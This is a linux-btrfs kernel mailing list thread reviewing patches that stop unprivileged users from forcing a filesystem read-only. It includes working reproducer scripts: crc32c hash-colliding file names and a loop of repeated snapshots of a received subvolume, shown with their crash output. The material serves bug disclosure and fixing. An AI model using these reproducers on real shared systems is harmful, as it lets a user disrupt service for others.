> 'AQci3EUB%shMsg-N%frgU:02ByLs=IPJU0OpgiWit5nexSyxZDncY6WB:=zKZuk5Zy0DD$Ua78%MelgBuMqaHGyKsJUFf9s=UW80PcJmKctb46KveLSiUtNmqrMiL9-Y0I_l5Fnam04CGIg=8@U:Z'
> 'CvVqJpJzueKcuA$wqwePfyu7VxuWNN3ho$p0zi2H8QFYK$7YlEqOhhb%:hHgjhIjW5vnqWHKNP4'
> 'ET:vk@rFU4tsvMB0$C_p=xQHaYZjvoF%-BTc%wkFW8yaDAPcCYoR%x$FH5O:' > 'HwTon%v7SGSP4FE08jBwwiu5aot2CFKXHTeEAa@38fUcNGOWvE@Mz6WBeDH_VooaZ6AgsXPkVGwy9l@@ZbNXabUU9csiWrrOp0MWUdfi$EZ3w9GkIqtz7I_eOsByOkBOO'
> 'Ij%2VlFGXSuPvxJGf5UWy6O@1svxGha%b@=%wjkq:CIgE6u7eJOjmQY5qTtxE2Rjbis9@us'
> 'KBkjG5%9R8K9sOG8UTnAYjxLNAvBmvV5vz3IiZaPmKuLYO03-6asI9lJ_j4@6Xo$KZicaLWJ3Pv8XEwVeUPMwbHYWwbx0pYvNlGMO9F:ZhHAwyctnGy%_eujl%WPd4U2BI7qooOSr85J-C2V$LfY'
> 'NcRfDfuUQ2=zP8K3CCF5dFcpfiOm6mwenShsAb_F%n6GAGC7fT2JFFn:c35X-3aYwoq7jNX5$ZJ6hI3wnZs$7KgGi7wjulffhHNUxAT0fRRLF39vJ@NvaEMxsMO'
> 'Oj42AQAEzRoTxa5OuSKIr=A_lwGMy132v4g3Pdq1GvUG9874YseIFQ6QU'
> 'Ono7avN5GjC:_6dBJ_'
> 'WHmN2gnmaN-9dVDy4aWo:yNGFzz8qsJyJhWEWcud7$QzN2D9R0efIWWEdu5kwWr73NZm4=@CoCDxrrZnRITr-kGtU_cfW2:%2_am'
> 'WiFnuTEhAG9FEC6zopQmj-A-$LDQ0T3WULz%ox3UZAPybSV6v1Z$b4L_XBi4M4BMBtJZpz93r9xafpB77r:lbwvitWRyo$odnAUYlYMmU4RvgnNd--e=I5hiEjGLETTtaScWlQp8mYsBovZwM2k'
> 'XKyH=OsOAF3p%uziGF_ZVr$ivrvhVgD@1u%5RtrV-gl_vqAwHkK@x7YwlxX3qT6WKKQ%PR56NrUBU2dOAOAdzr2=5nJuKPM-T-$ZpQfCL7phxQbUcb:BZOTPaFExc-qK-gDRCDW2'
> 'd3uUR6OFEwZr%ns1XH_@tbxA@cCPmbBRLdyh7p6V45H$P2$F%w0RqrD3M0g8aGvWpoTFMiBdOTJXjD:JF7=h9a_43xBywYAP%r$SPZi%zDg%ql-KvkdUCtF9OLaQlxmd'
> 'ePTpbnit%hyNm@WELlpKzNZYOzOTf8EQ$sEfkMy1VOfIUu3coyvIr13-Y7Sv5v-Ivax2Go_GQRFMU1b3362nktT9WOJf3SpT%z8sZmM3gvYQBDgmKI%%RM-G7hyrhgYflOw%z::ZRcv5O:lDCFm'
> 'evqk743Y@dvZAiG5J05L_ROFV@$2%rVWJ2%3nxV72-W7$e$-SK3tuSHA2mBt$qloC5jwNx33GmQUjD%akhBPu=VJ5g$xhlZiaFtTrjeeM5x7dt4cHpX0cZkmfImndYzGmvwQG:$euFYmXn$_2rA9mKZ'
> 'gkgUtnihWXsZQTEkrMAWIxir09k3t7jk_IK25t1:cy1XWN0GGqC%FrySdcmU7M8MuPO_ppkLw3=Dfr0UuBAL4%GFk2$Ma10V1jDRGJje%Xx9EV2ERaWKtjpwiZwh0gCSJsj5UL7CR8RtW5opCVFKGGy8Cky'
> 'hNgsG_8lNRik3PvphqPm0yEH3P%%fYG:kQLY=6O-61Wa6nrV_WVGR6TLB09vHOv%g4VQRP8Gzx7VXUY1qvZyS'
> 'isA7JVzN12xCxVPJZ_qoLm-pTBuhjjHMvV7o=F:EaClfYNyFGlsfw-Kf%uxdqW-kwk1sPl2vhbjyHU1A6$hz'
> 'kiJ_fgcdZFDiOptjgH5PN9-PSyLO4fbk_:u5_2tz35lV_iXiJ6cx7pwjTtKy-XGaQ5IefmpJ4N_ZqGsqCsKuqOOBgf9LkUdffHet@Wu'
> 'lvwtxyhE9:%Q3UxeHiViUyNzJsy:fm38pg_b6s25JvdhOAT=1s0$pG25x=LZ2rlHTszj=gN6M4zHZYr_qrB49i=pA--@WqWLIuX7o1S_SfS@2FSiUZN'
> 'rC24cw3UBDZ=5qJBUMs9e$=S4Y94ni%Z8639vnrGp=0Hv4z3dNFL0fBLmQ40=EYIY:Z=SLc@QLMSt2zsss2ZXrP7j4='
> 'uwGl2s-fFrf@GqS=DQqq2I0LJSsOmM%xzTjS:lzXguE3wChdMoHYtLRKPvfaPOZF2fER@j53evbKa7R%A7r4%YEkD=kicJe@SFiGtXHbKe4gCgPAYbnVn'
> 'UG37U6KKua2bgc:IHzRs7BnB6FD:2Mt5Cc5NdlsW%$1tyvnfz7S27FvNkroXwAW:mBZLA1@qa9WnDbHCDmQmfPMC9z-Eq6QT0jhhPpqyymaD:R02ghwYo%yx7SAaaq-:x33LYpei$5g8DMl3C'
> 'y2vjek0FE1PDJC0qpfnN:x8k2wCFZ9xiUF2ege=JnP98R%wxjKkdfEiLWvQzmnW'
> '8-HCSgH5B%K7P8_jaVtQhBXpBk:pE-$P7ts58U0J@iR9YZntMPl7j$s62yAJO@_9eanFPS54b=UTw$94C-t=HLxT8n6o9P=QnIxq-f1=Ne2dvhe6WbjEQtc'
> 'YPPh:IFt2mtR6XWSmjHptXL_hbSYu8bMw-JP8@PNyaFkdNFsk$M=xfL6LDKCDM-mSyGA_2MBwZ8Dr4=R1D%7-mCaaKGxb990jzaagRktDTyp'
> '9hD2ApKa_t_7x-a@GCG28kY:7$M@5udI1myQ$x5udtggvagmCQcq9QXWRC5hoB0o-_zHQUqZI5rMcz_kbMgvN5jr63LeYA4Cj-c6F5Ugmx6DgVf@2Jqm%MafecpgooqreJ53P-QTS'
> )
>
> # Now create files with all those names in the same parent directory.
> # It should not fail since a 4K leaf has enough space for them.
> for name in "${names[@]}"; do
> touch $MNT/$name
> done
>
> # Now add one more file name that causes a crc32c hash collision.
> # This should fail, but it should not turn the filesystem into RO mode
> # (which could be exploited by malicious users) due to a transaction
> # abort.
> touch $MNT/'W6tIm-VK2@BGC@IBfcgg6j_p:pxp_QUqtWpGD5Ok_GmijKOJJt'
>
> # Check that we are able to create another file, with a name that does not cause
> # a crc32c hash collision.
> echo -n "hello world" > $MNT/baz
>
> # Unmount and mount again, verify file baz exists and with the right content.
> umount $MNT
> mount $DEV $MNT
> echo "File baz content: $(cat $MNT/baz)"
>
> umount $MNT
>
> When running the reproducer:
>
> $ ./exploit-hash-collisions.sh
> (...)
> touch: cannot touch '/mnt/sdi/W6tIm-VK2@BGC@IBfcgg6j_p:pxp_QUqtWpGD5Ok_GmijKOJJt': Value too large for defined data type
> ./exploit-hash-collisions.sh: line 57: /mnt/sdi/baz: Read-only file system
> cat: /mnt/sdi/baz: No such file or directory
> File baz content:
>
> And the transaction abort stack trace in dmesg/syslog:
>
> $ dmesg
> (...)
> [758240.509761] ------------[ cut here ]------------
> [758240.510668] BTRFS: Transaction aborted (error -75)
> [758240.511577] WARNING: fs/btrfs/inode.c:6854 at btrfs_create_new_inode+0x805/0xb50 [btrfs], CPU#6: touch/888644
> [758240.513513] Modules linked in: btrfs dm_zero (...)
> [758240.523221] CPU: 6 UID: 0 PID: 888644 Comm: touch Tainted: G W 6.19.0-rc8-btrfs-next-225+ #1 PREEMPT(full)
> [758240.524621] Tainted: [W]=WARN
> [758240.525037] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014
> [758240.526331] RIP: 0010:btrfs_create_new_inode+0x80b/0xb50 [btrfs]
> [758240.527093] Code: 0f 82 cf (...)
> [758240.529211] RSP: 0018:ffffce64418fbb48 EFLAGS: 00010292
> [758240.529935] RAX: 00000000ffffffd3 RBX: 0000000000000000 RCX: 00000000ffffffb5
> [758240.531040] RDX: 0000000d04f33e06 RSI: 00000000ffffffb5 RDI: ffffffffc0919dd0
> [758240.531920] RBP: ffffce64418fbc10 R08: 0000000000000000 R09: 00000000ffffffb5
> [758240.532928] R10: 0000000000000000 R11: ffff8e52c0000000 R12: ffff8e53eee7d0f0
> [758240.533818] R13: ffff8e57f70932a0 R14: ffff8e5417629568 R15: 0000000000000000
> [758240.534664] FS: 00007f1959a2a740(0000) GS:ffff8e5b27cae000(0000) knlGS:0000000000000000
> [758240.535821] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> [758240.536644] CR2: 00007f1959b10ce0 CR3: 000000012a2cc005 CR4: 0000000000370ef0
> [758240.537517] Call Trace:
> [758240.537828] <TASK>
> [758240.538099] btrfs_create_common+0xbf/0x140 [btrfs]
> [758240.538760] path_openat+0x111a/0x15b0
> [758240.539252] do_filp_open+0xc2/0x170
> [758240.539699] ? preempt_count_add+0x47/0xa0
> [758240.540200] ? __virt_addr_valid+0xe4/0x1a0
> [758240.540800] ? __check_object_size+0x1b3/0x230
> [758240.541661] ? alloc_fd+0x118/0x180
> [758240.542315] do_sys_openat2+0x70/0xd0
> [758240.543012] __x64_sys_openat+0x50/0xa0
> [758240.543723] do_syscall_64+0x50/0xf20
> [758240.544462] entry_SYSCALL_64_after_hwframe+0x76/0x7e
> [758240.545397] RIP: 0033:0x7f1959abc687
> [758240.546019] Code: 48 89 fa (...)
> [758240.548522] RSP: 002b:00007ffe16ff8690 EFLAGS: 00000202 ORIG_RAX: 0000000000000101
> [758240.566278] RAX: ffffffffffffffda RBX: 00007f1959a2a740 RCX: 00007f1959abc687
> [758240.567068] RDX: 0000000000000941 RSI: 00007ffe16ffa333 RDI: ffffffffffffff9c
> [758240.567860] RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000
> [758240.568707] R10: 00000000000001b6 R11: 0000000000000202 R12: 0000561eec7c4b90
> [758240.569712] R13: 0000561eec7c311f R14: 00007ffe16ffa333 R15: 0000000000000000
> [758240.570758] </TASK>
> [758240.571040] ---[ end trace 0000000000000000 ]---
> [758240.571681] BTRFS: error (device sdi state A) in btrfs_create_new_inode:6854: errno=-75 unknown
> [758240.572899] BTRFS info (device sdi state EA): forced readonly
>
> Fix this by checking for hash collision, and if the adding a new name is
> possible, early in btrfs_create_new_inode() before we do any tree updates,
> so that we don't need to abort the transaction if we can not add the new
> name due to the leaf size limit.
>
> A test case for fstests will be sent soon.
>
> Fixes: caae78e03234 ("btrfs: move common inode creation code into btrfs_create_new_inode()")
This fix makes sense but I have two high level questions if you don't
mind:
I couldn't actually find the place EOVERFLOW is coming from.
my best guess is:
insert_with_overflow()
btrfs_insert_empty_item()
btrfs_insert_empty_items()
btrfs_search_slot()
search_leaf()
split_leaf()
if (extend && data_size + btrfs_item_size(l, slot) +
sizeof(struct btrfs_item) > BTRFS_LEAF_DATA_SIZE(fs_info))
return -EOVERFLOW;
Is that right? I am a bit confused how this doesn't get caught by the
check before the call to split leaf
i.e.,
if (leaf_free_space < ins_len) // ctree.c:1951
Also, would it theoretically be possible to extend the collision
handling to allow collisions to span leaves or is there some reason that
is complete no-go?
Regardless of the answers, this is well reasoned, well tested, and a
clear imporovement so please add:
Reviewed-by: Boris Burkov <boris@bur.io>
> Signed-off-by: Filipe Manana <fdmanana@suse.com>
> ---
> fs/btrfs/inode.c | 19 +++++++++++++++++++
> 1 file changed, 19 insertions(+)
>
> diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
> index b9f1bd18ea62..9a26fc5a5263 100644
> --- a/fs/btrfs/inode.c
> +++ b/fs/btrfs/inode.c
> @@ -6635,6 +6635,25 @@ int btrfs_create_new_inode(struct btrfs_trans_handle *trans,
> int ret;
> bool xa_reserved = false;
>
> + if (!args->orphan && !args->subvol) {
> + /*
> + * Before anything else, check if we can add the name to the
> + * parent directory. We want to avoid a dir item overflow in
> + * case we have an existing dir item due to existing name
> + * hash collisions. We do this check here before we call
> + * btrfs_add_link() down below so that we can avoid a
> + * transaction abort (which could be exploited by malicious
> + * users).
> + *
> + * For subvolumes we already do this in btrfs_mksubvol().
> + */
> + ret = btrfs_check_dir_item_collision(BTRFS_I(dir)->root,
> + btrfs_ino(BTRFS_I(dir)),
> + name);
> + if (ret < 0)
> + return ret;
> + }
> +
> path = btrfs_alloc_path();
> if (!path)
> return -ENOMEM;
> --
> 2.47.2
>
^ permalink raw reply [flat|nested] 15+ messages in thread
* Re: [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode
2026-02-26 14:33 [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode fdmanana
` (4 preceding siblings ...)
2026-02-26 14:34 ` [PATCH 5/5] btrfs: remove pointless error check in btrfs_check_dir_item_collision() fdmanana
@ 2026-02-26 19:10 ` Boris Burkov
2026-02-26 21:18 ` Filipe Manana
2026-02-26 23:10 ` Qu Wenruo
6 siblings, 1 reply; 15+ messages in thread
From: Boris Burkov @ 2026-02-26 19:10 UTC (permalink / raw)
To: fdmanana; +Cc: linux-btrfs
On Thu, Feb 26, 2026 at 02:33:57PM +0000, fdmanana@kernel.org wrote:
> From: Filipe Manana <fdmanana@suse.com>
>
> We have a couple scenarios that regular users can exploit to trigger a
> transaction abort and turn a filesystem into RO mode, causing some
> disruption. The first 2 patches fix these, the remainder are just a few
> trivial and cleanups.
Bug fixes and cleanups look good. No need to abort in these cases as you
have shown.
Reviewed-by: Boris Burkov <boris@bur.io>
But on the topic of security, or malicious users:
How is this sort of attack conceptually different from simply filling
up the filesystem with fallocates then doing random metadata operations
until we ENOSPC and go readonly?
What about if the attacker also exploits the behavior of the extent
allocator to try to produce fragmentation driven metadata ENOSPCs
aborts?
Thanks,
Boris
>
> Filipe Manana (5):
> btrfs: fix transaction abort on file creation due to name hash collision
> btrfs: fix transaction abort when snapshotting received subvolumes
> btrfs: stop checking for -EEXIST return value from btrfs_uuid_tree_add()
> btrfs: remove duplicated uuid tree existence check in btrfs_uuid_tree_add()
> btrfs: remove pointless error check in btrfs_check_dir_item_collision()
>
> fs/btrfs/dir-item.c | 4 +---
> fs/btrfs/inode.c | 19 +++++++++++++++++++
> fs/btrfs/ioctl.c | 2 +-
> fs/btrfs/transaction.c | 18 +++++++++++++++++-
> fs/btrfs/uuid-tree.c | 5 +----
> 5 files changed, 39 insertions(+), 9 deletions(-)
>
> --
> 2.47.2
>
^ permalink raw reply [flat|nested] 15+ messages in thread
* Re: [PATCH 2/5] btrfs: fix transaction abort when snapshotting received subvolumes
2026-02-26 14:33 ` [PATCH 2/5] btrfs: fix transaction abort when snapshotting received subvolumes fdmanana
@ 2026-02-26 20:40 ` Qu Wenruo
2026-02-26 21:30 ` Filipe Manana
0 siblings, 1 reply; 15+ messages in thread
From: Qu Wenruo @ 2026-02-26 20:40 UTC (permalink / raw)
To: fdmanana, linux-btrfs
在 2026/2/27 01:03, fdmanana@kernel.org 写道:
> From: Filipe Manana <fdmanana@suse.com>
>
> Currently a user can trigger a transaction abort by snapshotting a
> previously received snapshot a bunch of times until we reach a
> BTRFS_UUID_KEY_RECEIVED_SUBVOL item overflow (the maximum item size we
> can store in a leaf). This is very likely not common in practice, but
> if it happens, it turns the filesystem into RO mode. The snapshot, send
> and set_received_subvol and subvol_setflags (used by receive) don't
> require CAP_SYS_ADMIN, just inode_owner_or_capable(). A malicious user
> could use this to turn a filesystem into RO mode and disrupt a system.
>
> Reproducer script:
>
> $ cat test.sh
> #!/bin/bash
>
> DEV=/dev/sdi
> MNT=/mnt/sdi
>
> # Use smallest node size to make the test faster.
> mkfs.btrfs -f --nodesize 4K $DEV
> mount $DEV $MNT
>
> # Create a subvolume and set it to RO so that it can be used for send.
> btrfs subvolume create $MNT/sv
> touch $MNT/sv/foo
> btrfs property set $MNT/sv ro true
>
> # Send and receive the subvolume into snaps/sv.
> mkdir $MNT/snaps
> btrfs send $MNT/sv | btrfs receive $MNT/snaps
>
> # Now snapshot the received subvolume, which has a received_uuid, a
> # lot of times to trigger the leaf overflow.
> total=500
> for ((i = 1; i <= $total; i++)); do
> echo -ne "\rCreating snapshot $i/$total"
> btrfs subvolume snapshot -r $MNT/snaps/sv $MNT/snaps/sv_$i > /dev/null
> done
> echo
>
> umount $MNT
>
> When running the test:
>
> $ ./test.sh
> (...)
> Create subvolume '/mnt/sdi/sv'
> At subvol /mnt/sdi/sv
> At subvol sv
> Creating snapshot 496/500ERROR: Could not create subvolume: Value too large for defined data type
> Creating snapshot 497/500ERROR: Could not create subvolume: Read-only file system
> Creating snapshot 498/500ERROR: Could not create subvolume: Read-only file system
> Creating snapshot 499/500ERROR: Could not create subvolume: Read-only file system
> Creating snapshot 500/500ERROR: Could not create subvolume: Read-only file system
>
> And in dmesg/syslog:
>
> $ dmesg
> (...)
> [251067.627338] BTRFS warning (device sdi): insert uuid item failed -75 (0x4628b21c4ac8d898, 0x2598bee2b1515c91) type 252!
> [251067.629212] ------------[ cut here ]------------
> [251067.630033] BTRFS: Transaction aborted (error -75)
> [251067.630871] WARNING: fs/btrfs/transaction.c:1907 at create_pending_snapshot.cold+0x52/0x465 [btrfs], CPU#10: btrfs/615235
> [251067.632851] Modules linked in: btrfs dm_zero (...)
> [251067.644071] CPU: 10 UID: 0 PID: 615235 Comm: btrfs Tainted: G W 6.19.0-rc8-btrfs-next-225+ #1 PREEMPT(full)
> [251067.646165] Tainted: [W]=WARN
> [251067.646733] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014
> [251067.648735] RIP: 0010:create_pending_snapshot.cold+0x55/0x465 [btrfs]
> [251067.649984] Code: f0 48 0f (...)
> [251067.653313] RSP: 0018:ffffce644908fae8 EFLAGS: 00010292
> [251067.653987] RAX: 00000000ffffff01 RBX: ffff8e5639e63a80 RCX: 00000000ffffffd3
> [251067.655042] RDX: ffff8e53faa76b00 RSI: 00000000ffffffb5 RDI: ffffffffc0919750
> [251067.656077] RBP: ffffce644908fbd8 R08: 0000000000000000 R09: ffffce644908f820
> [251067.657068] R10: ffff8e5adc1fffa8 R11: 0000000000000003 R12: ffff8e53c0431bd0
> [251067.658050] R13: ffff8e5414593600 R14: ffff8e55efafd000 R15: 00000000ffffffb5
> [251067.659019] FS: 00007f2a4944b3c0(0000) GS:ffff8e5b27dae000(0000) knlGS:0000000000000000
> [251067.660115] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> [251067.660943] CR2: 00007ffc5aa57898 CR3: 00000005813a2003 CR4: 0000000000370ef0
> [251067.661972] Call Trace:
> [251067.662292] <TASK>
> [251067.662653] create_pending_snapshots+0x97/0xc0 [btrfs]
> [251067.663413] btrfs_commit_transaction+0x26e/0xc00 [btrfs]
> [251067.664257] ? btrfs_qgroup_convert_reserved_meta+0x35/0x390 [btrfs]
> [251067.665238] ? _raw_spin_unlock+0x15/0x30
> [251067.665837] ? record_root_in_trans+0xa2/0xd0 [btrfs]
> [251067.666531] btrfs_mksubvol+0x330/0x580 [btrfs]
> [251067.667145] btrfs_mksnapshot+0x74/0xa0 [btrfs]
> [251067.667827] __btrfs_ioctl_snap_create+0x194/0x1d0 [btrfs]
> [251067.668595] btrfs_ioctl_snap_create_v2+0x107/0x130 [btrfs]
> [251067.669479] btrfs_ioctl+0x1580/0x2690 [btrfs]
> [251067.670093] ? count_memcg_events+0x6d/0x180
> [251067.670849] ? handle_mm_fault+0x1a0/0x2a0
> [251067.671652] __x64_sys_ioctl+0x92/0xe0
> [251067.672406] do_syscall_64+0x50/0xf20
> [251067.673129] entry_SYSCALL_64_after_hwframe+0x76/0x7e
> [251067.674096] RIP: 0033:0x7f2a495648db
> [251067.674812] Code: 00 48 89 (...)
> [251067.678227] RSP: 002b:00007ffc5aa57840 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
> [251067.679691] RAX: ffffffffffffffda RBX: 0000000000000003 RCX: 00007f2a495648db
> [251067.681145] RDX: 00007ffc5aa588b0 RSI: 0000000050009417 RDI: 0000000000000004
> [251067.682511] RBP: 0000000000000002 R08: 0000000000000000 R09: 0000000000000000
> [251067.683842] R10: 000000000000000a R11: 0000000000000246 R12: 00007ffc5aa59910
> [251067.685176] R13: 00007ffc5aa588b0 R14: 0000000000000004 R15: 0000000000000006
> [251067.686524] </TASK>
> [251067.686972] ---[ end trace 0000000000000000 ]---
> [251067.687890] BTRFS: error (device sdi state A) in create_pending_snapshot:1907: errno=-75 unknown
> [251067.689049] BTRFS info (device sdi state EA): forced readonly
> [251067.689054] BTRFS warning (device sdi state EA): Skipping commit of aborted transaction.
> [251067.690119] BTRFS: error (device sdi state EA) in cleanup_transaction:2043: errno=-75 unknown
> [251067.702028] BTRFS info (device sdi state EA): last unmount of filesystem 46dc3975-30a2-4a69-a18f-418b859cccda
>
> Fix this by ignoring -EOVERFLOW errors from btrfs_uuid_tree_add() in the
> snapshot creation code when attempting to add the
> BTRFS_UUID_KEY_RECEIVED_SUBVOL item. This is ok because it's not critical
> and we are still able to delete the snapshot, as snapshot/subvolume
> deletion ignores if a BTRFS_UUID_KEY_RECEIVED_SUBVOL is missing (see
> inode.c:btrfs_delete_subvolume()). As for send/receive, we can still do
> send/receive operations since it always peeks the first root ID in the
> existing BTRFS_UUID_KEY_RECEIVED_SUBVOL (it could peek any since all
> snapshots have the same content), and even if the key is missing, it
> fallsback to searching by BTRFS_UUID_KEY_SUBVOL key.
>
> A test case for fstests will be sent soon.
>
> Fixes: dd5f9615fc5c ("Btrfs: maintain subvolume items in the UUID tree")
> Signed-off-by: Filipe Manana <fdmanana@suse.com>
> ---
> fs/btrfs/transaction.c | 16 ++++++++++++++++
> 1 file changed, 16 insertions(+)
>
> diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
> index 3112bd5520b7..1a0daf2c68fb 100644
> --- a/fs/btrfs/transaction.c
> +++ b/fs/btrfs/transaction.c
> @@ -1902,6 +1902,22 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
> ret = btrfs_uuid_tree_add(trans, new_root_item->received_uuid,
> BTRFS_UUID_KEY_RECEIVED_SUBVOL,
> objectid);
I'm just checking all other btrfs_uuid_tree_add() callsites, and
wondering if other call sites are also affected:
- _btrfs_ioctl_set_received_subvol()
Would this be affected too?
Thanks,
Qu
> + /*
> + * We are creating of lot of snapshots of the same root that was
> + * received (has a received UUID) and reached a leaf's limit for
> + * an item. We can safefly ignore this and avoid a transaction
> + * abort. A deletion of this snapshot will still work since we
> + * ignore if an item with a BTRFS_UUID_KEY_RECEIVED_SUBVOL key
> + * is missing (see btrfs_delete_subvolume()). Send/receive will
> + * work too since it peeks the first root id from the existing
> + * item (it could peek any), and in case it's missing it
> + * falls back to search by BTRFS_UUID_KEY_SUBVOL keys.
> + * Creation of a snapshot does not require CAP_SYS_ADMIN, so
> + * we don't want users triggering transaction aborts, either
> + * intentionally or not.
> + */
> + if (ret == -EOVERFLOW)
> + ret = 0;
> if (unlikely(ret && ret != -EEXIST)) {
> btrfs_abort_transaction(trans, ret);
> goto fail;
^ permalink raw reply [flat|nested] 15+ messages in thread
* Re: [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode
2026-02-26 19:10 ` [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode Boris Burkov
@ 2026-02-26 21:18 ` Filipe Manana
2026-02-26 21:57 ` Boris Burkov
0 siblings, 1 reply; 15+ messages in thread
From: Filipe Manana @ 2026-02-26 21:18 UTC (permalink / raw)
To: Boris Burkov; +Cc: linux-btrfs
On Thu, Feb 26, 2026 at 7:09 PM Boris Burkov <boris@bur.io> wrote:
>
> On Thu, Feb 26, 2026 at 02:33:57PM +0000, fdmanana@kernel.org wrote:
> > From: Filipe Manana <fdmanana@suse.com>
> >
> > We have a couple scenarios that regular users can exploit to trigger a
> > transaction abort and turn a filesystem into RO mode, causing some
> > disruption. The first 2 patches fix these, the remainder are just a few
> > trivial and cleanups.
>
> Bug fixes and cleanups look good. No need to abort in these cases as you
> have shown.
> Reviewed-by: Boris Burkov <boris@bur.io>
>
> But on the topic of security, or malicious users:
>
> How is this sort of attack conceptually different from simply filling
> up the filesystem with fallocates then doing random metadata operations
> until we ENOSPC and go readonly?
What makes you think that users causing an ENOSPC that triggers a
transaction abort isn't an issue?
If we know of any intentional way to trigger that, we should definitely fix it.
Even some weeks ago I fixed such a case reported by a user when
running bonnie++:
https://lore.kernel.org/linux-btrfs/SA1PR18MB56922F690C5EC2D85371408B998FA@SA1PR18MB5692.namprd18.prod.outlook.com/
We often see users reporting that sort of issue, but we don't know the
workloads, how to reproduce and the state of their fs most of the
time.
>
> What about if the attacker also exploits the behavior of the extent
> allocator to try to produce fragmentation driven metadata ENOSPCs
> aborts?
Do you know of a way to do that?
If you do, we should fix it.
No matter what a user does, especially a non-privileged user, it
should not trigger transaction aborts in an easy way (or anything else
bad, like memory leaks, use-after-frees, NULL pointer derefs, etc).
Thanks.
>
> Thanks,
> Boris
>
> >
> > Filipe Manana (5):
> > btrfs: fix transaction abort on file creation due to name hash collision
> > btrfs: fix transaction abort when snapshotting received subvolumes
> > btrfs: stop checking for -EEXIST return value from btrfs_uuid_tree_add()
> > btrfs: remove duplicated uuid tree existence check in btrfs_uuid_tree_add()
> > btrfs: remove pointless error check in btrfs_check_dir_item_collision()
> >
> > fs/btrfs/dir-item.c | 4 +---
> > fs/btrfs/inode.c | 19 +++++++++++++++++++
> > fs/btrfs/ioctl.c | 2 +-
> > fs/btrfs/transaction.c | 18 +++++++++++++++++-
> > fs/btrfs/uuid-tree.c | 5 +----
> > 5 files changed, 39 insertions(+), 9 deletions(-)
> >
> > --
> > 2.47.2
> >
^ permalink raw reply [flat|nested] 15+ messages in thread
* Re: [PATCH 1/5] btrfs: fix transaction abort on file creation due to name hash collision
2026-02-26 18:55 ` Boris Burkov
@ 2026-02-26 21:24 ` Filipe Manana
2026-02-26 21:29 ` Boris Burkov
0 siblings, 1 reply; 15+ messages in thread
From: Filipe Manana @ 2026-02-26 21:24 UTC (permalink / raw)
To: Boris Burkov; +Cc: linux-btrfs
On Thu, Feb 26, 2026 at 6:54 PM Boris Burkov <boris@bur.io> wrote:
>
> On Thu, Feb 26, 2026 at 02:33:58PM +0000, fdmanana@kernel.org wrote:
> > From: Filipe Manana <fdmanana@suse.com>
> >
> > If we attempt to create several files with names that result in the same
> > hash, we have to pack them in same dir item and that has a limit inherent
> > to the leaf size. However if we reach that limit, we trigger a transaction
> > abort and turns the filesystem into RO mode. This allows for a malicious
> > user to disrupt a system, without the need to have administration
> > privileges/capabilities.
> >
> > Reproducer:
> >
> > $ cat exploit-hash-collisions.sh
> > #!/bin/bash
> >
> > DEV=/dev/sdi
> > MNT=/mnt/sdi
> >
> > # Use smallest node size to make the test faster and require less file
> > # names that result in hash collision.
> > mkfs.btrfs -f --nodesize 4K $DEV
> > mount $DEV $MNT
> >
> > # List of names that result in the same crc32c hash for btrfs.
> > declare -a names=(
> > 'foobar'
> > '%a8tYkxfGMLWRGr55QSeQc4PBNH9PCLIvR6jZnkDtUUru1t@RouaUe_L:@xGkbO3nCwvLNYeK9vhE628gss:T$yZjZ5l-Nbd6CbC$M=hqE-ujhJICXyIxBvYrIU9-TDC'
> > 'AQci3EUB%shMsg-N%frgU:02ByLs=IPJU0OpgiWit5nexSyxZDncY6WB:=zKZuk5Zy0DD$Ua78%MelgBuMqaHGyKsJUFf9s=UW80PcJmKctb46KveLSiUtNmqrMiL9-Y0I_l5Fnam04CGIg=8@U:Z'
> > 'CvVqJpJzueKcuA$wqwePfyu7VxuWNN3ho$p0zi2H8QFYK$7YlEqOhhb%:hHgjhIjW5vnqWHKNP4'
> > 'ET:vk@rFU4tsvMB0$C_p=xQHaYZjvoF%-BTc%wkFW8yaDAPcCYoR%x$FH5O:' > 'HwTon%v7SGSP4FE08jBwwiu5aot2CFKXHTeEAa@38fUcNGOWvE@Mz6WBeDH_VooaZ6AgsXPkVGwy9l@@ZbNXabUU9csiWrrOp0MWUdfi$EZ3w9GkIqtz7I_eOsByOkBOO'
> > 'Ij%2VlFGXSuPvxJGf5UWy6O@1svxGha%b@=%wjkq:CIgE6u7eJOjmQY5qTtxE2Rjbis9@us'
> > 'KBkjG5%9R8K9sOG8UTnAYjxLNAvBmvV5vz3IiZaPmKuLYO03-6asI9lJ_j4@6Xo$KZicaLWJ3Pv8XEwVeUPMwbHYWwbx0pYvNlGMO9F:ZhHAwyctnGy%_eujl%WPd4U2BI7qooOSr85J-C2V$LfY'
> > 'NcRfDfuUQ2=zP8K3CCF5dFcpfiOm6mwenShsAb_F%n6GAGC7fT2JFFn:c35X-3aYwoq7jNX5$ZJ6hI3wnZs$7KgGi7wjulffhHNUxAT0fRRLF39vJ@NvaEMxsMO'
> > 'Oj42AQAEzRoTxa5OuSKIr=A_lwGMy132v4g3Pdq1GvUG9874YseIFQ6QU'
> > 'Ono7avN5GjC:_6dBJ_'
> > 'WHmN2gnmaN-9dVDy4aWo:yNGFzz8qsJyJhWEWcud7$QzN2D9R0efIWWEdu5kwWr73NZm4=@CoCDxrrZnRITr-kGtU_cfW2:%2_am'
> > 'WiFnuTEhAG9FEC6zopQmj-A-$LDQ0T3WULz%ox3UZAPybSV6v1Z$b4L_XBi4M4BMBtJZpz93r9xafpB77r:lbwvitWRyo$odnAUYlYMmU4RvgnNd--e=I5hiEjGLETTtaScWlQp8mYsBovZwM2k'
